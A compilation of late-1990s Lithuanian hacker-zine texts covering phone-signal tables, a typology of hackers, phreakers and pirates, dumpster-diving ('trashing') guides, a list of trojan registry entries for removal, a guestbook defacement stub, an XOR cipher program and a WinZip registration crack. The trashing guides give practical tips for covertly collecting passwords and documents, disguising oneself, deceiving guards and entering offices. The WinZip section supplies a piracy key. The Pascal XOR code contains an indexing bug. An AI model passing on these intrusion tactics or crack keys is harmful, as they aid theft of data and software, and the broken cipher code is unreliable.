Aukshtesniosios grupes dazhniai: 1209 Hz, 1336 Hz, 1477 Hz, 1633 Hz;

Toks kodas uzhtikrina 16 signaliniu dazhniu kombinaciju, 10 ish kuriu naudojamos renkant numeri. Mygtukai # ir * naudojami renkant papildomu paslaugu kodus, o mygtukai A, B, C, D naudojami ishplestineje klaviaturoje.

Dvieju dazhniu signalo siuntimas turi trukti ne trumpiau 40 ms, pauzes – ne trumpiau 26 ms. Dazhniu stabilumas – ne prascziau kaip 1.6 %

DTMF standarto signalai:

Dazhnis 1209 Hz 1336 Hz 1477 Hz 1633 Hz

697 Hz 1 2 3 A

770 Hz 4 5 6 B

852 Hz 7 8 9 C

941 Hz * 0 # D

MKTT standartas

Shio standarto signalai – dazhniu rinkinys „2 ish 6” ir yra labiausiai zhinomi ish automatinio numerio nustatymo aparaturos. Ish ju formuojamas toninis ATS atsakymas, tacziau „beintervaliniai paketai” – ne vienintele shiu signalu panaudojimo sritis. Jie taip pat naudojami ir po viena signalizacijai tarp telefono stocziu.

Skirtingai nei DTMF, visi MKTT dazhniai 700, 900, 1100, 1300, 1500, 1700 Hz yra lygiateisiai ir gali buti bet kokioje kombinacijoje (aishku ishskirus vienodas), tokiu budu yra 15 imanomu toniniu signalu.

MKTT standarto signalai:

Dazhnis, Hz 700 900 1100 1300 1500 1700

700 N

900 „1” N

1100 „2” „3” N

1300 „4” „5” „6” N

1500 „7” „8” „9” „0” N

1700 – – Begin Repeat – N

P.S.

Komentaru ir pasiulymu laukiu adresu ww0lf@pogrindis.net

Gal kas gali parashyti koki ishsamu failiuka apie tonine signalizacija tarp ATS Lietuvos Telekomo tinkluose? 🙂 Taip pat bucziau dekingas uzh bet kokia info apie Lietuvos Telekomo tinklus ir ATS

Knowledge is power! ww0lf

49. Technologinio andegraundo atstovu tipologija

MG, 1999, Kaunas

I. Ivadas

Gyvename technikos amzhiuje. Visos gyvenimo sritys tampa vis labiau kompiuterizuotos, automatizuotos bei technologizuotos. Tai, be abejo, daro musu gyvenima patogesni, didina darbo nashuma ir skatina progresa. Tacziau ne paslaptis, kad technologijos pasiekimais sekmingai naudojasi ir kriminalinis pasaulis. Nusikaltimams ivykdyti yra panaudojama moderniausia technika, samdomi specialistai, netgi atliekami tirinejimai.

Tacziau ne tik nusikalstamojo pasaulio atstovai gadina gyvenima doriems musu kompiuterizuotos visuomenes nariams. Yra zhmoniu, kurie tai daro ish idejos: kovodami uzh savo isitikinimus, „griaudami Sistema”, arba tiesiog todel, kad jiems tai patinka. Kiberpankai, kompiuteriniai anarchistai ir technologiniai chuliganai… Juos ir turesime omeny kalbedami apie marga technologini pogrindi.

II.Tipologija

1. Hackeriai

Hackeriai – tai bene zhinomiausia technologinio pogrindzhio atstovu grupe. Del paties zhodzhio „hacker” pradines reikshmes net dabar yra diskutuojama. Vienas ish variantu – kad jis reishke meistra, kirviu gaminanti baldus. Taciau shio zhodzhio naudojimo jo dabartine prasme pradzhios reiktu ieshkoti JAV Masacziusetso Technologiniame Universitete.

7-ame deshimtmetyje, pacioje kompiuteriu eros pradzhioje hackeriais eme vadinti kietus „programerius”, kuriems nepakako tiesiog vartotoju igudzhiu, kurie gilinosi i paczius kompiuterio veikimo principus ir jaute malonuma programuodami. Veliau, kai atsirado kompiuteriu tinklai, galimybe pasiekti kita kompiuteri per atstuma, atsirado ir pirmi kompiuteriniai nusikaltimai.

Kadangi tokio pobudzhio veiklai reikejo atitinkamu zhiniu, hackerius susiejo (ir ne be pagrindo) su shiais „isilauzhimais”. O veliau jau spauda prisidejo prie hackerio, kaip piktojo kompiuterijos genijaus ivaizdzhio formavimo.

Tai kas gi vis delto yra hackeris? Apibendrindami galime pasakyti, kad tai aukshto lygio kompiuterines technikos (kaip hardo taip ir softo) ir kompiuteriniu tinklu specialistas, zhinantis keleta programavimo kalbu, turintis nestandartini mastyma ir gera humoro jausma. Hackeriui kompiuteris – tai ne tik darbas ar hobis. Jam tai – gyvenimo budas. …

Specializacijos prasme hackeris – tai kompiuteriniu tinklu bei nesankcionuoto patekimo i ishskirstytas informacines sistemas specialistas.

Tacziau pilnavercziu hackeriu galima vadinti tik ta, kuris savarankishkai igyvendina 3 isilauzhimo i sistema pakopas: sistemos analize ir jos pazheidzhiamumu pajieshka, programine atakos realizacija, ir pagaliau pats patekimas i apsaugota sistema.

2. Phreakeriai

Phreakeriai (ish anglishko „Phone freak”-telefoninis manijakas)

specializuojasi telikomunikacijoje. Ju aistra – telefonu tinklai. …

Galima sakyti, kad pirmi phreakeriai buvo linksmi vaikinai, dirbantys pirmuosiuose telefonu komutatoriuose, kada Bell’o ishradimas ka tik pradejo uzhkariauti pasauli. Dabartinius phreakerius pagal sritis galima skirstyti i mobilaus ryshio phreakerius (cellular phreakers), anologiniu telefono stocziu specialistus, bei tuos, kurie uzhsiima skaitmeninu telefono ryshiu.

Yra dar viena sritis, kur phreakerius galima sieti su carderiais – tai taksofonai, naudojantys plastikines korteles, taczhiau apie korteles –

shiek tiek veliau. Kaip phreakeriu veiklos pavyzdzhius galime pamineti nemokama naudojimasi telefono ryshio paslaugomis, telefono stochiu kontrole (vadinami „boksai” – prietaisai, leidzhiantys emuliuoti telefono stoties signalus ish eilinio abonento telefono linijos), mobilaus ryshio monitoringa.

3. Carderiai

Carderiai („card” – kortele): juos domina viskas, kas susije su plastikinemis kortelemis. Siauriau – nusikaltimai kreditiniu korteliu pagalba. Shiais laikais plastikines korteles uzhima vis daugiau vietos ivairiu paslaugu sferoje. Su jomis siejama vadinama „saugiu pinigu” ideja.

Kiek ji saugi rodo vis didejantis nusikaltimu, ivykdytu plastikiniu korteliu pagalba, skaiczius. Taciau reiktu skirti atvejus, kai tokio nusikaltimo realizavimui naudojamos aukshtosios technologijos (telefono korteles „czipo” signalo emuliavimas, t. y. amzhina kortele; kreditiniu korteliu numeriu algoritmo „lauzhymas”; operacijos su bankomatais) nuo elementaraus sukcziavimo, pasitelkiant galiojancziu kreditiniu korteliu numerius, vogtas korteles, etc.

4. Crackeriai

Crackeriai („crack” – lauzhti): komercines programines irangos „lauzhymas” – apsaugos nuo nelegalaus kopijavimo ir diegimo neutralizavimas. Galima sakyti, kad tai jau shiek tiek pasenusi savoka, nes panashia veikla dabar uzhsiima warezmanai. Crackeriais vadinami programuotojai, atliekantys pati apsaugos nuo programu nuemima, programos kodo analize bei „crack’u” (specialiu programu, neutralizuojancziu apsauginio mechanizmo veikima) rashyma. Crackeriai dazhnai bendradarbiauja su warezmanais, arba yra ivairiu piratiniu grupiu nariai.

5. Warezmanai

Warezmanai („warez” – nelegalios programines irangos kopijos):

programines irangos piratai. Warezmanai dirba grupemis kuriu viduje egzistuoja funkciju pasidalijimas. Paprastai tokioje grupeje buna:

naujausios programines irangos tiekejai (dazhnai piratinis produktas pasirodo rinkoje ankscziau nei legali programa); kurjeriai, randantys vieta programines irangos saugojimui (czia warezmanai dazhnai pasitelkia i pagalba hackerius, kurie nulauzhia koki nors nuobodu serveri, ir paverchia ji piratiniu programu saugykla, naudodamiesi shio serverio resursais, o serverio savininkas nieko net neitaria iki tol, kol milzhinishkai padidejes trafikas ne atkreipia demesio, kad czia kazhkas netvarkoj);

crackeriai, atliekantys apsauginiu programos mechanizmu neutralizavima;

dileriai – ish esmes neturintys nieko bendro su kompiuteriais, bet atliekantys piratines programines irangos platinima bei tvarkantys visus organizacinius reikalus.

6. Virus-makeriai

Kaip jau aishku ish pavadinimo, virus-makeriai, tai virusu autoriai.

Ju arkliukas – asembleris ir matematine logika. Kas yra kompiuteriu virusas czia neaishkinsim, nezhinantys tegul pasidomi specialioje literaturoje.

Technologinio pogrindzhio atstovai vertina virusu autorius dvejopai:

vieni mano shi uzhsiemima esa beprasmiu, brutaliu vandalizmu, kiti jais zhavisi ir juos idealizuoja, ir czia, ko gero, viskas priklauso nuo pozhiurio.

Galima zhavetis dirbtinos gyvybes formos kureju, bet veikejo, jauczianczio malonuma skleidzhiant totaline destrukcija kitaip negu socialiniu psichopatu nepavadinsi.

50. Trashing

Negalvokit, kad hakeris viska padaro tik sededamas prie kompiuterio. Vienas is budu gauti informacija apie auka yra TRASHINGAS (nuo anglisko zodzio trash- siuksles). Pasiknisus aukos siukslineja galima gauti daug info apie auka. Pvz.: ivairius manualus, instrukcijas apie ivaire aukos technine iranga. Galima gauti net ir acountu slaptazodziu, nes kai kurie zmones, kad neuzmirstu juos uzsiraso kur nors ir pota gali si uzrasa ismesti.

Patarimai busimiems trasherems:

-=Pasiimkit su savim keleta daiktu:=-

1. Maisa siukslem. Jug nepulsi viska skaityt vietoj. Viska reikia parsinesti. O kaip tu kitaip parinesi? Beje geriau isideti keleta maisu, nes gali vienas suplysti arba netilpti siuksles i viena.

2. Zibintuveli (prozektoriu). Geriausiai eiti nakti (kuo maziau zmoniu matys tuo geriau), todel reikia su kazkuo pasisviesti ir prozektorius tam puikiai tinka. Patarimas: isitikink ar tikrai veikia jis korektiskai, ar baterijos nenuses etc, prisitvirtink ji kad butu patogu naudotis.

3. Gumines pirstines. Nors jus knisites po visokius popiergalius, bet vistiek reikia apsidrausti, nes galite uztaikyti ant sekretores maisto likuciu, „Allways” :), etc.

4. Tinkama apranga. Ka daryti jei kas nors prades saukti: ko cia knisies? Tada padeda tinkama apranga: kaip kokio slavejo, siusklininko, alchaso. Jei busite apsirenges kaip alchasas, tai galesite pasiteisinti: renku butelius; pravers keletas bonkiu, kad skambetu itikinamiau.

-=Patarimai:=-

Geriausia pries viska darant gerai viska apgalvoti, suzinoti siuksliu vezimo grafikus (kad netektu knistis po tuscia konteineri). Gal net tektu ieit i ofiso (ar pan) patalpas ir siuksles pasiimti is ten (galima ir ne tik siuksles).

Pries eidamas i si zygi patikrink visas kisenes etc: ar nera jokiu nereikalingu daiktu, dokumentu etc (jie gali maisyti zygio metu, gai juos pamesti, arba per juos gali indentifikuoti tave).

Grize ir viska apziureje pasalinkite viska. Issimaudykite po dusu, vonioje etc.

51. Trashingas 2

Trashing’as (nuo anglishko „trash” – „shiukshles”), tai vienas ish alternatyviniu budu, kuriais hackeris gauna jam reikiamos informacijos.

Kartais tiesiog neitiketina, kiek daug galima suzhinoti apie istaigos ar organizacijos funkcionavima pazhvelgus i jos shiukshliu dezhiu turini.

Ten galima rasti telefonu sarashus, skirtus vidaus naudojimui, ivairius manualus ir instrukcijas, organizaciju pavadinimus ir asmenu pavardes, info apie projektu vystyma, failus magnetiniuose diskeliuose ir daug kitokios labai idomios informacijos. Pvz., neseniai teko pastebeti remonto atlieku kruva prie naujo „Snoro” banko ofiso. Tarp ju voliojosi karonines dezhes nuo baldu ir orgtechnikos. Paanalizavus 🙂 shias atliekas, pavyko aptikti banke naudojamu modemu su Remote Management tech. aprashymus ir insrukcijas, bei keleta manualu nuo aparaturos, skirtos kreditiniu korteliu aptarnavimui.

Butu tiesiog neracionalu shia informacija nepasinaudoti.

Aishku, galima dabar tiesiog ishkart varyti tushtinti visus pasitaikusius shiukshliu konteinerius. Taciau ash patarciau shiam zhygiui gerai pasiruoshti.

Pradekim nuo materialines bazes.

Taigi – „Universalus Trasherio Rinkinys:”

Gumines pirshtines: Nors dauguma shiukshliu, kuriose jums teks knistis yra „shvarios” – pagrinde popieriai – vis tiek pravartu jas tureti. Taip pat devekite pirshtines namuose, kai jus rushiuosite savo grobi.

Zhibintuvelis: Pritvirtinkite prie jo virves gabala arba brezentini dirzheli su kilpa, kuria butu patogu uzhmauti ant rankos. Galingas zhibintuvas labai pravers jums naktinese zhygiuose, ypac konteinerio viduje. Isitikinkite, kad jis veikia, ir kad elementai jusu nepaves.

Maishai shiukshlem: Labiausiai tinka tamsus ir nepermatomi – jus juk nenorite, kad kiti matytu kas juose yra. Patyre zhmones ima ishkart du maishus –

vienas kitame, tam atvejui, jei vienas ish ju suplishtu.

Tinkama apranga: Nevertetu tirineti konteinerius su shiukshlem apsivilkus shliubini kostiuma. Tas pats ir del batu. Apsirenkite patogiai, geriausiai senais drabuzhiais, kuriuos nebutu gaila sugadinti. Jeigu turite kazhka panashaus i specialiuosius drabuzhius – uzhsidekite juos (labai praverstu oranzhine shlavejo ar shiukshlininko lemene). Jeigu jums yra zhinoma, kad kompanijos aptarnaujantis personalas paprastai devi tam tikros spalvos marshkinius, kepuraites ar shvarkus, pasistenkite apsirengti kuo panashiau.

Kitais atvejais rinkites tamses drabuzhiu spalvas.

Tushti buteliai: Taip, taip, nesijuokit 🙂 Kai kurie hackeriai pasako sargams ar kitiems apsauginiams, kad ieshko tushciu buteliu. Reiktu isideti keleta ju i savo maisha, kad atrodytumet itikinamiau.

Bendros rekomendacijos: Geriausia uzhsiimt trashingu kai yra nusistoveje sausi sauleti orai, kad jusu paieshku objektas butu deramam stovyje.

Priesh isheidami ish namu, galite atlikti mazhyti sociologini tyrima, paskambinti i specialiosios paskirties bendroves, uzhsiimancias shiukshliu ishvezhimu, suzhinoti ju darbo grafikus. Galbut jums netgi pavyktu lokalizuoti vietas savartyne, kur vezhamos shiukshles ish tam tikru ofisu.

Galite taip pat pameginti patekti i ofisu patalpas ir pagrobti 🙂 ishmestus popierius tiesiai ish ten.

Ruoshdamiesi trashingo akcijai, priesh isheinant ish namu, pasitikrinkite kishenes: ar jose nera pashaliniu daiktu ar dokumentu, leidzhianciu jus identifikuoti, o taip pat daiktu, kuriuos galite pamesti.

Ir dar vienas neblogas patarimas: grizhe ish medzhiokles, nusiprauskite po dushu 🙂

Sekmes.

MG , 1998

52. TrOJAN REMOVAL

Jei pasigavai koki trojana, kuris tave labai nervina, nieko baisaus! Trojanai – nera labai baisus, kaip atrodo ish pirmo zhvilgsnio… Jiuos visada galima panaikinti, bet visu pirma ishsiaishkinkime kaip jis pas tave pateko. Shtai keletas patarimu, kad jo daugiau nebutu tavo sistemoje:

1. Niekada mIRC’e, ICQ ar kur nors kitur nepriimk keistu failu su keistais pavadinimais pvz: sexypic.bmp.exe!

2. Priesh paleisdamas kiekviena gauta faila ish nepazhistamo/nepatikimo zhmogaus perskanuok ji su antivirusine!

3. Naudok ugnies sienas (firewall), kurios tave apsaugos nuo piktadariu 🙂

Tai butu keletas tokiu smulkiu patarimu… Kad panaikinti jau i sistema isivelusi trojana, tau teriekia surasti jo prirashyta informacija, bei ja ishtrinti. Shtai ka irasho shie trojanai:

Sub 7 2.1

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „Winloader”=”MSREXE.exe”

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] „WinLoader”=”MSREXE.exe”

Win.ini [windows] load=MSREXE.exe

System.ini shell=Explorer.exe MSREXE.exe

Deep Throat 3.1

Nusikopijuoja i: c:windowssystray.exe (Nesumaishyk su: c:windowssystemsystray .exe 🙂

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „Systemtray”=”c:\windows\systray.exe”

Shadow Phyre

Nusikopijuoja i:

c:windowssysteminet.exe c:windowssystemWinZipp.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„WinZipp”=”C:\WINDOWS\SYSTEM\WinZipp.exe /nomsg”

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices]

„INET Wizard”=”C:\WINDOWS\SYSTEM\inet.exe /nomsg”

Tiny Telnet Server

Nusikopijuoja i: c:windowswindll.exe 127488 Baitu

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„Windll.exe”=”C:\WINDOWS\Windll.exe”

Kuang

Nusikopijuoja i:

c:windows_webcache_.exe

C:WINDOWSSYSTEMTemp$1.exe

Regedit:

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]

„WebAccelerator”=”_webcache_.exe”

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„Temp$1.task”=”C:\WINDOWS\SYSTEM\Temp$1.exe”

Netsphere

Nusikopijuoja i:

C:WINDOWSsystemnssx.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „NSSX”=”C:\WINDOWS\system\nssx.exe”

FakeVirii

Nusikopijuoja i:

C:WINDOWSsystemnssx.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] „Kernel32.dll”=”c:\windows\ccc.exe”

Satans Back Door

Nusikopijuoja i:

C:windowssysprot.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] „sysprot „protection”=”C:\windows\sysprot.exe”

Indoctrination

Nusikopijuoja i:

C:windowssysprot.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesOnce]

„Msgsrv16″=”Msgsrv16”

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce]

„Msgsrv16″=”Msgsrv16”

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„Msgsrv16″=”Msgsrv16”

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]

„Msgsrv16″=”Msgsrv16”

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices]

„Msgsrv16″=”Msgsrv16”

JammerKillah12

Nusikopijuoja i:

C:windowsMsWin32.drv

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices]

„MsWindrv”=”MsWin32.drv”

AolTrojan

Nusikopijuoja i :

C:windowsDAT92003.exe arba

C:windowsDAT92003.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„dat92003″=”C:\WINDOWS\SYSTEM\DAT92003.exe”

Hack’a’tack

Nusikopijuoja i:

C:windowsExpl32.exe

Regedit:

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„Explorer32″=”C:\WINDOWS\Expl32.exe”

The Unexplained

Nusikopijuoja i:

C:windowsINETB00ST.EXE

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„InetB00st”=”C:\WINDOWS\TEMP\INETB00ST.EXE”

Progenic Trojan Beta Series

Nusikopijuoja i:

c:windowsscandiskvr.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„Scandisk”=”c:\windows\scandiskvr.exe”

Hack’a’ttack1.12

Nusikopijuoja i:

C:WINDOWSExpl32.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„Explorer32″=”C:\WINDOWS\Expl32.exe”

BackConstruction 1.2

Nusikopijuoja i:

C:WINDOWSCmctl32.exe

Regedit:

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]

„Shell”=”C:\WINDOWS\Cmctl32.exe”

Netsphere Final

Nusikopijuoja i: c:windowssystemepp32.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„ExecPowerProfile”=”C:\WINDOWS\system\epp32.exe”

Vampire

Nusikopijuoja i: c:windowssystemSockets.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „Sockets”=”c:windowssystemSockets.exe”

Maverick’s Matrix

Nusikopijuoja i: C:WINDOWSWincfg.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „Wincfg.exe”=”C:WINDOWSWincfg.exe”

Total Eclypse

Nusikopijuoja i: C:WindowsSystemRmaapp.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „Rnaapp”=”C:\Windows\System\Rmaapp.exe”

Vampire 1.2

Nusikopijuoja i: c:windowssystemWinboot.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „WindowsBootFile”=”c:\windows\system\Winboot.exe”

Incommand

Nusikopijuoja i: Path_Where_RunFilename.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „AdvancedSettings”=”Path_Where_RunFilename.exe”

Transscout 1.1 +1.2

Nusikopijuoja i: c:windowskernel16.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „kernel16″=”C:\WINDOWS\kernel16.exe”

Ambush

Nusikopijuoja i: c:windowsZcn32.exe

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]

„ZKA”=”Zcn32.exe”

DerSpaeher3

Nusikopijuoja i: C:WINDOWSSystemdkbdll.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „Explore”=”C:WINDOWSSystem\dkbdll.exe Hi”

Subseven 2.x

Nusikopijuoja i: C:WINDOWSMSREXE.exe

Regedit:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] „Winloader”=”MSREXE.exe”

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices] „WinLoader”=”MSREXE.exe”Win.ini:

Win.ini:

[windows] load=MSREXE.exe

System.ini:

shell=Explorer.exe MSREXE.exe

Y3k

Nusikopijuoja i: C:WINDOWSSYSTEMRundII.EXE

Regedit:

[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]

„Explorer32″=”C:\WINDOWS\RundII.exe”

Remote hack 1.1 & 1.2

Nusikopijuoja i: C:WINDOWSSYSTEMRundII.EXE

Regedit:

[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]

„Norton Anti Virus”=”C:\WINDOWS\norton.exe”

BioNet (Ver: 0-8-4; 0.8.71; 2.2.1; 2.6.1)

Nusikopijuoja i: C:WINDOWSSYSTEMlibupdate.exe

Regedit:

[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]

„WinLibUpdate”=”C:\WINDOWS\libupdate.exe -hide”

SheepGoat

Nusikopijuoja i: C:WINDOWSSYSTEMSG.scr

Win.ini:

run=C:WINDOWSSYSTEMSG.scr

CrazyNet

Nusikopijuoja i: C:WINDOWSRegistry32.exe

Regedit:

[HKCUUSoftwareMicrosoftWindowsCurrentVersionRun]

„Reg32″=”Registry32.exe”

Win.ini:

run=Registry32.exe

System.ini:

shell=Explorer.exe Registry32.exe

Taigi, jums tereikia vis tai pratrinti ir problemos kaip nebuta! Sekmes! NUKE

53. Web crack

Kaip nuhakinti saita Puslapio nuhakinimo yra daug budu.Viena ash ish ju chia paminesiu.Tai vienuzhodzhiu yra hackinimas per guestbook,a. Jums tereikia surasti saita kuriame bootu guestbook’as,ir toje vietoje kur turetumete parashyti kaip patiko saitas,parashykite scripta, tai yra: Ir viskas. Happy Hacking. Skeletaz

54. XOR- sifravimo metodas

Vienas is paprasciausiu sifravimu yra XOR metodas. Jis pagrystas logine funkcija XOR.

XOR reiksmiu lentele:

argumentai reiksme 1 1 0

1 0 1

0 1 1

0 0 0

Sifravimas algoritmas toks:

1. Imamas tokio ilgio tekstas/duomenys [kuriuos norme uzsifruoti], koks yra slaptazodzio ilgis.

2. Kiekvienas, atitinkamas teksto/duomenu baitas ir slaptazodzio baitas pateikami kaip XOR argumentai.

3. Gautas baitas ir yra tas uzsifruotas baitas.

4. Imama sekantys slaptazodzio ilgio baitai ir (kol tekstas/duomenys nesibaige) vykdoma punktas nr. 2.

Issifravimas analogiskas sifravimui:

Imamas uzsifruotas tekstas/duomenys ir jie dar karta sifruojami pagal auksciau pateikta algoritma.

Gaunamas nesifruotas tekstas.

Sio metodo trukumai yra tie, jog jei sifrojamas normalus tekstas ir slaptazodis nelabai ilgas, tai gan lengvai galima pralausti si algoritma brute force`u.

Jei kas susizavejo siuo algoritmu, tai parasiau trumpa programele, kuri demonstruoja sifravima/desifravima duomenis.

uses crt;

var unsifred, {nesifruota fraze}

sifred, {sifruota fraze}

desifred, {issifruota fraze}

key: string; {sifravimoraktas}

i, {pagalbinis kintamasis}

ki : byte; {rakto ilgi nusakantis dydis}

begin

ClrScr; {valom ekrana}

WriteLn ( ‘Ivesk fraze kuria sifruosi:’ );

ReadLn ( unsifred ); {Ivedam sifruojama fraze}

WriteLn ( ‘Ivesk rakta pagal kuri sifruosi:’ );

ReadLn ( key ); {Ivedam sifravimo rakta}

ki := Length ( key ); {Randam rakto ilgi}

sifred := unsifred; {Padarom eilutes, kuriu ilgiai}

desifred := unsifred; {butu lygus frazes ilgiui}

for i := 1 to Length ( unsifred ) do {Sifruojame}

sifred [ i ] := Chr ( ord ( unsifred [ i ] ) xor

Ord ( key [ i mod ki ] ) );

WriteLn (sifred); {Sausdiname uzsifruota fraze}

for i := 1 to Length ( unsifred ) do {Desifruojame/atsifruojame}

desifred [ i ] := Chr ( ord ( sifred [ i ] ) xor

Ord ( key [ i mod ki ] ) );

WriteLn (desifred); {Sausdiname atsifruota fraze}

ReadLn; {Laukiame [ENTER] paspaudimo}

55. Kaip nucrackin’ti WinZip 7.0

Nukrakinti WinZip very zaprasta.Paleisk WinZip.PairinkOrder ir, jai nebijai necenzuriniu zhodzhiu i User namelaukeli ivesk:

eik nx

O i password:

111111bf

Shtai ir viskas

Happy cracking.

Skeletaz